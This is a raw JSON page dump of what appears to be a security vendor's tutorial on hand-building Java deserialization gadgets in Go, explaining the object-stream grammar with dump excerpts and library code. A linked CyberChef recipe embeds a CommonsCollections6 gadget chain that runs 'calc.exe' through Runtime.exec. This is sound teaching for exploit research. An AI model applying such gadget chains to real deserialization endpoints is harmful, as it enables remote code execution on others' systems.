Exploitation.",[47,13142,13143],{"href":13143,"rel":13144},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002F2024-exploitation-trends",[51],{"title":219,"searchDepth":220,"depth":220,"links":13146},[13147,13148,13151,13152,13157,13158,13159,13160,13165,13166,13167,13168,13169],{"id":3520,"depth":220,"text":20},{"id":12389,"depth":220,"text":12390,"children":13149},[13150],{"id":12416,"depth":1266,"text":12417},{"id":12522,"depth":220,"text":12523},{"id":12558,"depth":220,"text":12559,"children":13153},[13154,13155,13156],{"id":12572,"depth":1266,"text":12573},{"id":12623,"depth":1266,"text":12624},{"id":12678,"depth":1266,"text":12679},{"id":12735,"depth":220,"text":12736},{"id":12801,"depth":220,"text":12802},{"id":12897,"depth":220,"text":12898},{"id":12920,"depth":220,"text":12921,"children":13161},[13162,13163,13164],{"id":12927,"depth":1266,"text":12928},{"id":12939,"depth":1266,"text":12940},{"id":12962,"depth":1266,"text":12963},{"id":12985,"depth":220,"text":12986},{"id":13047,"depth":220,"text":13048},{"id":13080,"depth":220,"text":13081},{"id":13101,"depth":220,"text":13102},{"id":10520,"depth":220,"text":13119},"2026-02-11","Using IBM's 2025 Cost of a Data Breach data, VulnCheck's 28-day speed advantage translates to $518,000 in risk avoided per incident.",{},"\u002Fblog\u002Feconomic-value-lead-time",{"title":12342,"description":13171},"blog\u002Feconomic-value-lead-time",[1280,1279],"tJFrpb3Q-CIQZ5OQ-1WNQgZ7aRmOk6Y7FeuXjJOf22E",{"id":13179,"title":13180,"articles":7,"authors":13181,"body":13187,"date":14357,"description":14358,"extension":234,"image":7,"link":7,"meta":14359,"navigation":237,"path":14361,"seo":14362,"series":7,"stem":14363,"subtype":7,"tags":14364,"__hash__":14367},"blog\u002Fblog\u002Fmaking-java-gadgets.md","Making Serialization Gadgets by Hand - Java",[13182],{"name":13183,"avatar":13184,"link":13185,"linkName":13186},"Jonathan Peterson","https:\u002F\u002Favatars.githubusercontent.com\u002Fu\u002F203699168","https:\u002F\u002Finfosec.exchange\u002F@lobsterjerusalem","@lobsterjerusalem",{"type":15,"value":13188,"toc":14337},[13189,13195,13203,13209,13222,13225,13231,13234,13290,13294,13301,13304,13312,13329,13335,13338,13344,13354,13358,13378,13384,13413,13419,13425,13432,13463,13469,13487,13501,13504,13508,13529,13535,13556,13562,13568,13582,13592,13606,13619,13625,13631,13651,13654,13660,13670,13676,13690,13696,13702,13708,13724,13730,13752,13758,13764,13776,13779,13789,13795,13804,13810,13821,13830,13835,13841,13849,13852,13874,13877,13883,13901,13904,13910,13923,13953,13975,13981,13985,13994,14000,14003,14011,14017,14032,14049,14065,14072,14078,14103,14107,14121,14127,14133,14140,14146,14152,14162,14168,14173,14187,14203,14207,14216,14222,14228,14231,14237,14244,14250,14256,14263,14266,14268,14276,14280,14283,14286,14292,14300,14302],[61,13190,13192],{"id":13191},"this-blog-will-cover",[295,13193,13194],{},"This Blog Will Cover",[22,13196,13197,13200],{},[25,13198,13199],{},"How to create your own Java gadget deserialization library, including a breakdown on Java object streams",[25,13201,13202],{},"How to use VulnChecks’s Java deserialization library for Golang-based exploits",[61,13204,13206],{"id":13205},"continuing-the-thread",[295,13207,13208],{},"Continuing The Thread",[18,13210,13211,13212,13217,13218,13221],{},"This blog serves as a follow-up to ",[47,13213,13216],{"href":13214,"rel":13215},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmaking-dotnet-gadgets",[51],"our previous blog"," on writing .NET serialization gadgets by hand. While that piece is not a necessary pre-requisite to understand the contents of this blog, it may provide some insight as to ",[1131,13219,13220],{},"why"," we are writing these gadgets by hand.",[18,13223,13224],{},"This time we are taking a look at the “Java Object Serialization Protocol”, whose specifications are not nearly as verbose or detailed as the .NET specifications. Nevertheless, with the protocol analysis tool we’ll be using, vague specs will be enough.",[993,13226,13228],{"id":13227},"useful-resources",[295,13229,13230],{},"Useful Resources",[18,13232,13233],{},"The items below will help with following along with the blog:",[22,13235,13236,13253,13262,13269,13282],{},[25,13237,13238,13239,13243,13244,13248,13249],{},"The entire Java Objection Serialization spec is ",[47,13240,305],{"href":13241,"rel":13242},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fplatform\u002Fserialization\u002Fspec\u002Fprotocol.html",[51],", with the most important bits for our purposes documented in the “rules of grammar” ",[47,13245,305],{"href":13246,"rel":13247},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fplatform\u002Fserialization\u002Fspec\u002Fprotocol.html#a9298",[51]," and in “Symbols and Constants” ",[47,13250,305],{"href":13251,"rel":13252},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fplatform\u002Fserialization\u002Fspec\u002Fprotocol.html#a10152",[51],[25,13254,13255,13256,13261],{},"An example serialized Java object gadget stream (CommonsCollections6) that we will be working with is viewable using this ",[47,13257,13260],{"href":13258,"rel":13259},"https:\u002F\u002Fgchq.github.io\u002FCyberChef\u002F#recipe=To_Hexdump(16,false,false,false)&input=rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI\u002FQAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB%2BAAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo\u002F2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB%2BABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5%2Bkde0cCAAB4cAAAAAF0AAhjYWxjLmV4ZXQABGV4ZWN1cQB%2BABsAAAABcQB%2BACBzcQB%2BAA9zcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh4",[51],"CyberChef page"," maintained by GCHQ",[25,13263,13264,13265],{},"A Java object analysis tool for “dumping” the stream: ",[47,13266,13267],{"href":13267,"rel":13268},"https:\u002F\u002Fgithub.com\u002Fphith0n\u002Fzkar",[51],[25,13270,2245,13271,13275,13276,13281],{},[47,13272,13274],{"href":13267,"rel":13273},[51],"zkar"," dump ",[47,13277,13280],{"href":13278,"rel":13279},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmaking-java-gadgets\u002Fzkar.txt",[51],"hosted here"," (more on this in a moment)",[25,13283,13284,13285],{},"VulnCheck’s Java serialization gadget library is located on ",[47,13286,13289],{"href":13287,"rel":13288},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain\u002Fjava",[51],"GitHub here",[61,13291,13293],{"id":13292},"introduction-to-the-java-serialization-stream","Introduction to the Java Serialization Stream",[18,13295,13296,13297,13300],{},"With .NET, I described the serialization stream as a sequence of discrete data structures called “records.” The Java object serialization stream can be thought of in the same way, though with less complexity and greater verbosity. We will also be calling the constituent structs of the stream “records” here, too. To make things easier for myself (and readers) this time around, I used a tool called, ",[47,13298,13274],{"href":13267,"rel":13299},[51]," (credit to phith0n), that takes a serialization object binary stream as input and outputs what is basically a blueprint for the object, describing all of these records one by one in the order that they exist in the object. With the identification of the records laid out for you in this way, you can simply start building your structs out one by one. An example of a snippet from the dump is below.",[18,13302,13303],{},"Given the verbose nature of the Java stream, we won’t cover the full object in this blog, but rather some of the smaller pieces (records) that make up the stream. The zkar output for this gadget is about 500 lines and mostly consists of the same object types with more of the same nested inside, so readers should be able to understand the gist.",[61,13305,13307,13308,13311],{"id":13306},"you-can-view-the-full-library-with-all-relevant-records-implemented-in-vulnchecks-go-exploit-framework-here-github-getting-started","You can view the full library with all relevant records implemented in VulnCheck’s go-exploit framework here: ",[47,13309,3054],{"href":13287,"rel":13310},[51]," Getting Started",[18,13313,13314,13315,13320,13321,13325,13326,4606],{},"In the first 10 lines of the zkar output, there are a few mandatory elements that kick off the stream. First is the “",[47,13316,13319],{"href":13317,"rel":13318},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FMagic_number_(programming)",[51],"magic","”, denoting that the upcoming binary blob is indeed a serialized Java object stream that, in line with the ",[47,13322,13324],{"href":13241,"rel":13323},[51],"specification"," provided earlier, must start with a ",[47,13327,13319],{"href":13317,"rel":13328},[51],[1354,13330,13333],{"className":13331,"code":13332,"language":1359,"meta":219},[1357],"stream:\n magic version contents\n",[886,13334,13332],{"__ignoreMap":219},[18,13336,13337],{},"After cross-referencing this with the zkar output, we see the magic, a version, and the start of “contents”:",[1354,13339,13342],{"className":13340,"code":13341,"language":1359,"meta":219},[1357],"@Magic - 0xac ed\n@Version - 0x00 05\n@Contents\n TC_OBJECT - 0x73\n TC_CLASSDESC - 0x72\n @ClassName\n @Length - 17 - 0x00 11\n @Value - java.util.HashSet - 0x6a 61 76 61 2e 75 74 69 6c 2e 48 61 73 68 53 65 74\n @SerialVersionUID - -5024744406713321676 - 0xba 44 85 95 96 b8 b7 34\n @Handler - 8257536\n",[886,13343,13341],{"__ignoreMap":219},[18,13345,13346,13347,13350,13351,59],{},"The magic is made up of the two-byte hexadecimal value ",[886,13348,13349],{},"0xACED",", followed by the version, which will remain static as another two-byte value: ",[886,13352,13353],{},"0x0005",[993,13355,13357],{"id":13356},"reading-the-dump-and-specs","Reading The Dump and “Specs”",[18,13359,13360,13361,13363,13364,13367,13368,13371,13372,1554,13375,4606],{},"Following the ",[886,13362,13319],{}," (written as @Magic in the zkar output) and ",[886,13365,13366],{},"version,"," we get ",[886,13369,13370],{},"contents",", which according to the spec can be an ",[886,13373,13374],{},"object",[886,13376,13377],{},"blockdata",[1354,13379,13382],{"className":13380,"code":13381,"language":1359,"meta":219},[1357],"content: \u002F\u002F content can be an object or a blockdata\n object\n blockdata\n",[886,13383,13381],{"__ignoreMap":219},[18,13385,13386,13387,13390,13391,13393,13394,13396,13397,1554,13399,13401,13402,982,13404,13406,13407,982,13410,59],{},"This should give you an idea of how to read the spec. Basically, it shows some record type (in this case, ",[886,13388,13389],{},"content",") and then right below it,all the possible records that you can represent ",[886,13392,13389],{},". In this case, ",[886,13395,13389],{}," can be an ",[886,13398,13374],{},[886,13400,13377],{},". In order to see what ",[886,13403,13374],{},[886,13405,13377],{}," are, you will need to go look at the sections that start with ",[886,13408,13409],{},"object:",[886,13411,13412],{},"blockdata:",[18,13414,13415,13416,13418],{},"The section for ",[886,13417,13374],{}," is shown below:",[1354,13420,13423],{"className":13421,"code":13422,"language":1359,"meta":219},[1357],"object:\n newObject\n newClass\n newArray\n newString\n newEnum\n newClassDesc\n prevObject\n nullReference\n exception\n TC_RESET\n",[886,13424,13422],{"__ignoreMap":219},[18,13426,13427,13428,13431],{},"Here we see that “",[886,13429,13430],{},"object”"," can be ten different things, and for each item, we need to examine their respective sections, or “specs” as I will be calling them.",[18,13433,13434,13435,13438,13439,13442,13443,13446,13447,13450,13451,13453,13454,982,13456,13458,13459,13462],{},"Let’s use an example that actually ",[1131,13436,13437],{},"defines"," a record rather than just pointing to yet another record which points to yet another record, etc. Looking at the spec for ",[886,13440,13441],{},"blockdata,"," which points to either a ",[886,13444,13445],{},"blockdatashort"," or a ",[886,13448,13449],{},"blockdatalong",". But then right beneath ",[886,13452,13377],{}," you can see the specs for ",[886,13455,13445],{},[886,13457,13449],{},". Both of these show just one line and they start with ",[886,13460,13461],{},"TC_",", followed by a sequence of data types; this is information defining exactly how to represent that record in the stream, in binary.",[1354,13464,13467],{"className":13465,"code":13466,"language":1359,"meta":219},[1357],"blockdata: \u002F\u002F has two entries beneath it showing that it may be represented by two different possible items\n blockdatashort \u003C- can be this \n blockdatalong \u003C- or this, see the next two blocks for what these look like\n\nblockdatashort: \u002F\u002F has only one line. Also it starts with a TC_ byte, another indicator that we are defining \"actual\" data\n TC_BLOCKDATA (unsigned byte)\u003Csize> (byte)[size] \u003C- the byte layout, what a blockdatashort MUST look like\n\nblockdatalong:\n TC_BLOCKDATALONG (int)\u003Csize> (byte)[size] \u003C- same as blockdata but it can be 0xffffffff long.\n",[886,13468,13466],{"__ignoreMap":219},[18,13470,13471,13472,13475,13476,13478,13479,13483,13484,13486],{},"Notice that the first item in that line is ",[886,13473,13474],{},"TC_BLOCKDATALONG",". This all capital word that starts with ",[886,13477,13461],{}," is a placeholder for what is basically the record code, a list of which is seen in the “",[47,13480,13482],{"href":13251,"rel":13481},[51],"Terminal Symbols and Constants","” section mentioned earlier. These ",[886,13485,13461],{}," values are very similar to the “RecordTypeEnums” from the .NET specification, in that they are a single byte that serves the same purpose of describing the upcoming record.",[18,13488,13489,13490,13492,13493,13496,13497,13500],{},"Looking at that constant’s section and cross referencing it with the above spec, it’s possible to figure out that the ",[886,13491,13449],{}," is made up of ",[886,13494,13495],{},"TC_BLOCKDATALONG,"," which is represented as a hexadecimal ",[886,13498,13499],{},"0x7A",". That is then followed by a four-byte int representing the size of the last portion, which is just a sequence of bytes, the size of which is defined by the preceding four-byte int.",[18,13502,13503],{},"That is the basic run down on how to understand this dump and use the spec to figure out the rules. If it still doesn’t make sense, don’t worry — it should get easier as we see more of them.",[993,13505,13507],{"id":13506},"continuing-on","Continuing On",[18,13509,13510,13511,13513,13514,13517,13518,13521,13522,13524,13525,13528],{},"So looking back at the ",[886,13512,13374],{},", first we see the constant, denoting which record is coming up; in this case it is “",[886,13515,13516],{},"TC_OBJECT","”, which is represented as ",[886,13519,13520],{},"0x73",". We know from the spec that ",[886,13523,13516],{}," is used by the ",[886,13526,13527],{},"newObject,"," for which the spec is:",[1354,13530,13533],{"className":13531,"code":13532,"language":1359,"meta":219},[1357],"newObject:\n TC_OBJECT classDesc newHandle classdata[] \u002F\u002F data for each class\n",[886,13534,13532],{"__ignoreMap":219},[18,13536,13537,13538,13541,13542,13544,13545,1246,13548,13551,13552,13555],{},"From this we can tell that ",[886,13539,13540],{},"newObject"," is made up of the ",[886,13543,13516],{}," code, followed by a ",[886,13546,13547],{},"classDesc",[886,13549,13550],{},"newHandle",", and a sequence of ",[886,13553,13554],{},"classdata","s.",[18,13557,13558,13559,13561],{},"So first we need to define the ",[886,13560,13547],{},", which as the name suggests, describes a class. Looking at the spec below, you can get an idea of what is expected in this record:",[1354,13563,13566],{"className":13564,"code":13565,"language":1359,"meta":219},[1357],"classDesc:\n newClassDesc\n nullReference\n (ClassDesc)prevObject \u002F\u002F an object required to be of type ClassDesc\n\nnewClassDesc:\n TC_CLASSDESC className serialVersionUID newHandle classDescInfo\n TC_PROXYCLASSDESC newHandle proxyClassDescInfo\n\nnullReference\n TC_NULL\n",[886,13567,13565],{"__ignoreMap":219},[18,13569,13570,13571,13573,13574,13577,13578,13581],{},"So looking at the dump we know that we will be making the ",[886,13572,13547],{}," using ",[886,13575,13576],{},"newClassDesc"," because we see the ",[886,13579,13580],{},"TC_CLASSDESC"," type code being used.",[18,13583,13584,13585,13587,13588,13591],{},"So the first item after the type code (",[886,13586,13580],{},") we see we need the ",[886,13589,13590],{},"className"," which, not too dissimilar from .NET, is a string, prefixed by its length. Though instead of using a 7-bit length encoding like in .NET, this protocol just wants a two byte, Big-endian number representing the length of the string.",[18,13593,13594,13595,13598,13599,13602,13603,13605],{},"In this case, we know the class name is ",[886,13596,13597],{},"java.util.HashSet",", which is 17 characters long, so we end up with ",[886,13600,13601],{},"0x0011"," immediately followed by the string “",[886,13604,13597],{},"”.",[18,13607,13608,13609,13611,13612,13615,13616,59],{},"Next down the ",[886,13610,13576],{}," list is the ",[886,13613,13614],{},"serialVersionUID",", which exists to determine if a version of a class and a serialized stream object match. This way, whatever is parsing the stream will know whether or not it should attempt to deserialize the provided stream into its version of the class. For our purposes, just copy what you see, and in this case it is ",[886,13617,13618],{},"0xBA44859596B8B734",[18,13620,13621,13622,13624],{},"Then we see ",[886,13623,13550],{},", aka Handler in zkar, which is described in the specs as:",[1354,13626,13629],{"className":13627,"code":13628,"language":1359,"meta":219},[1357],"newHandle: \u002F\u002F The next number in sequence is assigned\n \u002F\u002F to the object being serialized or deserialized\n",[886,13630,13628],{"__ignoreMap":219},[18,13632,13633,13634,13638,13639,13642,13643,13646,13647,13650],{},"This is quite similar to the ObjectID in the .NET spec but represented in a different way. First of all, you do not need to actually include this value in the stream; it is a value that starts at 8257536 and iterates every time a record type is introduced that has ",[1131,13635,13636],{},[886,13637,13550],{}," in the specs. To clarify, you do not need to write the handles into the stream, whatever is parsing them is expected to keep track of how many objects it has parsed at any given point. While you do not explicitly write the handle into the stream yourself, you ",[1131,13640,13641],{},"will"," use them as values when creating ",[886,13644,13645],{},"TC_REFERENCE"," records, which is basically identical to .NET’s ",[886,13648,13649],{},"MemberReference",". We won’t go too far into these right now but at least know what handles are for and why they show up in the zkar dump.",[18,13652,13653],{},"Let’s look at the next few lines of the zkar dump (lines 11-18):",[1354,13655,13658],{"className":13656,"code":13657,"language":1359,"meta":219},[1357],"@ClassDescFlags - SC_SERIALIZABLE|SC_WRITE_METHOD - 0x03\n@FieldCount - 0 - 0x00 00\n[]Fields\n[]ClassAnnotations\nTC_ENDBLOCKDATA - 0x78\n@SuperClassDesc\nTC_NULL - 0x70\n@Handler - 8257537\n",[886,13659,13657],{"__ignoreMap":219},[18,13661,13662,13663,13665,13666,13669],{},"The next part here starts the final piece of ",[886,13664,13576],{},", the ",[886,13667,13668],{},"classDescInfo",", which from the protocol spec is made up of four other items:",[1354,13671,13674],{"className":13672,"code":13673,"language":1359,"meta":219},[1357],"classDescInfo:\n classDescFlags fields classAnnotation superClassDesc\n",[886,13675,13673],{"__ignoreMap":219},[18,13677,13678,13681,13682,13685,13686,13689],{},[886,13679,13680],{},"classDescFlags"," is a single-byte bitwise flag. Going by the zkar output, we know this is going to be ",[886,13683,13684],{},"0x03",". There is more information about this in the spec’s ",[886,13687,13688],{},"classdata:"," section but for building out gadgets, we can just copy this byte and move on.",[18,13691,13692,13693,4606],{},"The next item is ",[886,13694,13695],{},"fields",[1354,13697,13700],{"className":13698,"code":13699,"language":1359,"meta":219},[1357],"fields:\n (short)\u003Ccount> fieldDesc[count]\n",[886,13701,13699],{"__ignoreMap":219},[18,13703,13704,13705,59],{},"This one starts with a two-byte value that specifies the number of fields. This class apparently has no fields — therefore, the count is 0, which as a short is ",[886,13706,13707],{},"0x0000",[18,13709,13710,13711,13714,13715,13718,13719,13721,13722,59],{},"Following that is ",[886,13712,13713],{},"classAnnotation",", which according to spec is ",[886,13716,13717],{},"endBlockData"," which optionally can be preceded by ",[886,13720,13370],{},"; though from what I have seen so far, it is most often just ",[886,13723,13717],{},[1354,13725,13728],{"className":13726,"code":13727,"language":1359,"meta":219},[1357],"classAnnotation:\n endBlockData\n contents endBlockData \u002F\u002F contents written by annotateClass\n",[886,13729,13727],{"__ignoreMap":219},[18,13731,13732,13733,13736,13737,13740,13741,13740,13744,13747,13748,13751],{},"Next we have the ",[886,13734,13735],{},"superClassDesc",", which can be yet another ",[886,13738,13739],{},"newClassDesc`, or alternatively *","nullReference",[886,13742,13743],{},"*, which is more commonly the case. Going by the dump here, we will use",[886,13745,13746],{},"which is just a","TC_NULL",[886,13749,13750],{},"code byte, represented as","0x70`.",[18,13753,13754,13755,13757],{},"That finishes off the first part of the ",[886,13756,13516],{},", so now let’s see what it would look like if we did this in Golang:",[1354,13759,13762],{"className":13760,"code":13761,"language":1359,"meta":219},[1357],"\u002F\u002F 'terminal codes'\nconst TCNullCode = \"\\x70\"\nconst TCReferenceCode = \"\\x71\"\nconst TCClassDescCode = \"\\x72\"\n... \u002F\u002F cut for brevity\n\ntype TCContent interface {\n\u002F\u002F we know we want everything to end up as a stream of bytes, so it makes sense\n\u002F\u002F to have an interface for this to use across various \"record\" types.\n ToBytes() (string, bool) \n}\n\ntype Field interface {\n\u002F\u002F Fields can be many different types, so it is best to implement an interface\n\u002F\u002F for these, there will be more on fields later.\n ToFieldBin() (string, bool)\n}\n\ntype TCClassDesc struct {\n Name string \u002F\u002F will be lenPrefixedString'd\n SerialVersionUID string \u002F\u002F 8 bytes\n Flags string \u002F\u002F optional, if omitted will default to SCSerializableCode\n Fields []Field\n SuperClassDesc TCContent\n}\n\ntype TCObject struct {\n ClassDesc TCClassDesc \u002F\u002F will contain the part we just did \n ClassData []TCContent\n}\n\nfunc (tcClassDesc *TCClassDesc) getFieldsBin() (string, bool) {\n binary := transform.PackBigInt16(len(tcClassDesc.Fields))\n for _, field := range tcClassDesc.Fields {\n bin, ok := field.ToFieldBin()\n if !ok {\n output.PrintfFrameworkError(\"Failed to get bin for field %q\", field)\n return \"\", false\n }\n binary += bin\n }\n return binary, true\n}\n\nfunc (tcClassDesc TCClassDesc) ToBytes() (string, bool) {\n fieldsBinString, _ := tcClassDesc.getFieldsBin()\n if tcClassDesc.Flags == \"\" {\n tcClassDesc.Flags = SCSerializableCode\n }\n\n binary := TCClassDescCode +\n lenPrefixedString(tcClassDesc.Name) +\n tcClassDesc.SerialVersionUID +\n tcClassDesc.Flags +\n fieldsBinString\n\n \u002F\u002F TODO support actual annotations\n binary += TCEndBlockDataCode\n\n if tcClassDesc.SuperClassDesc == nil {\n binary += TCNullCode\n } else {\n superClassString, ok := tcClassDesc.SuperClassDesc.ToBytes()\n if !ok {\n return \"\", false\n }\n binary += superClassString\n }\n return binary, true\n}\n\n\u002F\u002F actual usage \nTCObject {\n ClassDesc: TCClassDesc {\n Name: \"java.util.HashSet\",\n SerialVersionUID: \"\\xba\\x44\\x85\\x95\\x96\\xb8\\xb7\\x34\",\n Flags: \"\\x03\",\n Fields: []Field{},\n },\n}\n",[886,13763,13761],{"__ignoreMap":219},[18,13765,13766,13767,13770,13771,13775],{},"Obviously there are some pieces I left out for brevity, such as the helper function, ",[886,13768,13769],{},"lenPrefixedString()",", and some methods, but all of those can be found ",[47,13772,13774],{"href":13287,"rel":13773},[51],"on the library github",". This provides a basic outline of what we are going for, though.",[61,13777,13778],{"id":13554},"ClassData",[18,13780,13781,13782,13784,13785,13788],{},"To complete the ",[886,13783,13540],{}," that we started in the last section, we still need the ",[886,13786,13787],{},"classdata[]"," portion that supplies the data for the class that was defined.",[1354,13790,13793],{"className":13791,"code":13792,"language":1359,"meta":219},[1357],"newObject:\n TC_OBJECT classDesc newHandle classdata[] \u002F\u002F data for each class\n\nclassdata:\n nowrclass \u002F\u002F SC_SERIALIZABLE & classDescFlag &&\n \u002F\u002F !(SC_WRITE_METHOD & classDescFlags)\n wrclass objectAnnotation \u002F\u002F SC_SERIALIZABLE & classDescFlag &&\n \u002F\u002F SC_WRITE_METHOD & classDescFlags\n externalContents \u002F\u002F SC_EXTERNALIZABLE & classDescFlag &&\n \u002F\u002F !(SC_BLOCKDATA & classDescFlags\n objectAnnotation \u002F\u002F SC_EXTERNALIZABLE & classDescFlag&& \n \u002F\u002F SC_BLOCKDATA & classDescFlags\n",[886,13794,13792],{"__ignoreMap":219},[18,13796,13797,13798,13801,13802,59],{},"Looking at the dump, the next record that gets defined is the ",[886,13799,13800],{},"objectAnnotation",", which ends up being ",[886,13803,13377],{},[1354,13805,13808],{"className":13806,"code":13807,"language":1359,"meta":219},[1357],"blockdatashort:\n TC_BLOCKDATA (unsigned byte)\u003Csize> (byte)[size]\n",[886,13809,13807],{"__ignoreMap":219},[18,13811,13812,13813,13816,13817,13820],{},"This will be the ",[886,13814,13815],{},"TC_BLOCKDATA"," record byte (",[886,13818,13819],{},"0x77","); then a single byte denoting the size of bytes for the data; and then finally, the data itself.",[18,13822,13823,13826,13827,13829],{},[295,13824,13825],{},"Note:"," This size value is NOT present in the zkar dump at the time of this writing, which is likely an oversight; I am just mentioning this here to prevent confusion, as it ",[1131,13828,4563],{}," need to be included in the stream.",[18,13831,13832,13833,4606],{},"Another example of how to “code-ify” one of these records — something like this will work for ",[886,13834,13815],{},[1354,13836,13839],{"className":13837,"code":13838,"language":1359,"meta":219},[1357],"type TCBlockData struct {\n Data []byte\n}\n\nfunc (tcBlockData TCBlockData) ToBytes() ([]byte, bool) {\n if len(tcBlockData.Data) > 0xff {\n output.PrintError(\"Provided data buffer is too large for this record type, use BLOCKDATALONG instead\")\nreturn []byte{}, false\n }\n buf := []byte{byte(len(tcBlockData.Data))}\n return append(buf, tcBlockData.Data...), true\n}\n",[886,13840,13838],{"__ignoreMap":219},[18,13842,13360,13843,13845,13846,13848],{},[886,13844,13815],{},", we have what looks like another ",[886,13847,13540],{}," record, nested inside of the first one. This sort of thing is what lends these gadgets their verbosity; a great deal of nesting is common in these gadgets, which makes understanding them difficult.",[18,13850,13851],{},"This next object is similar to the previous one, but now we have fields, so let’s see how those manifest in the object stream. Here I will make the notation a little shorter and more readable since we have gone over this record type before.",[18,13853,13854,13855,13858,13859,13862,13863,13866,13867,13870,13871],{},"ClassName: ",[886,13856,13857],{},"0x0034"," + ",[886,13860,13861],{},"org.apache.commons.collections.keyvalue.TiedMapEntry",":br\nSerialVersionUID: ",[886,13864,13865],{},"0x8AADD29B39C11FDB",":br\nClassDescFlags: ",[886,13868,13869],{},"0x02",":br\nFieldCount: ",[886,13872,13873],{},"0x0002",[18,13875,13876],{},"Here is the spec for fields:",[1354,13878,13881],{"className":13879,"code":13880,"language":1359,"meta":219},[1357],"fields:\n (short)\u003Ccount> fieldDesc[count]\n\nfieldDesc:\n primitiveDesc\n objectDesc\n\nprimitiveDesc:\n prim_typecode fieldName\n\nobjectDesc:\n obj_typecode fieldName className1\n\nfieldName:\n (utf)\n\nclassName1:\n (String)object \u002F\u002F String containing the field's type,\n \u002F\u002F in field descriptor format\nprim_typecode:\n `B' \u002F\u002F byte\n `C' \u002F\u002F char\n `D' \u002F\u002F double\n `F' \u002F\u002F float\n `I' \u002F\u002F integer\n `J' \u002F\u002F long\n `S' \u002F\u002F short\n `Z' \u002F\u002F boolean\n\nobj_typecode:\n `[` \u002F\u002F array\n `L' \u002F\u002F object\n",[886,13882,13880],{"__ignoreMap":219},[18,13884,13885,13886,13889,13890,13893,13894,13897,13898,59],{},"So we have already seen the first part of the `fields` section, it is a short (two bytes) that represents the number of fields. But in our previous example there were no fields. However, if fields ",[1131,13887,13888],{},"do"," exist for the class, like in this one, then they must follow the ",[886,13891,13892],{},"fieldDesc"," spec, which can be one of two types: a ",[886,13895,13896],{},"primitiveDesc"," or an ",[886,13899,13900],{},"objectDesc",[18,13902,13903],{},"The dump for the Fields section of TiedMapEntry is here:",[1354,13905,13908],{"className":13906,"code":13907,"language":1359,"meta":219},[1357],"@FieldCount - 2 - 0x00 02\n[]Fields\n Index 0:\n Object - L - 0x4c\n @FieldName\n @Length - 3 - 0x00 03\n @Value - key - 0x6b 65 79\n @ClassName\n TC_STRING - 0x74\n @Handler - 8257539\n @Length - 18 - 0x00 12\n @Value - Ljava\u002Flang\u002FObject; - 0x4c 6a 61 76 61 2f 6c 61 6e 67 2f 4f 62 6a 65 63 74 3b\n Index 1:\n Object - L - 0x4c\n @FieldName\n @Length - 3 - 0x00 03\n @Value - map - 0x6d 61 70\n @ClassName\n TC_STRING - 0x74\n @Handler - 8257540\n @Length - 15 - 0x00 0f\n @Value - Ljava\u002Futil\u002FMap; - 0x4c 6a 61 76 61 2f 75 74 69 6c 2f 4d 61 70 3b\n",[886,13909,13907],{"__ignoreMap":219},[18,13911,13912,13913,13915,13916,13919,13920,13922],{},"Here we are expecting to define two fields, both of which will be 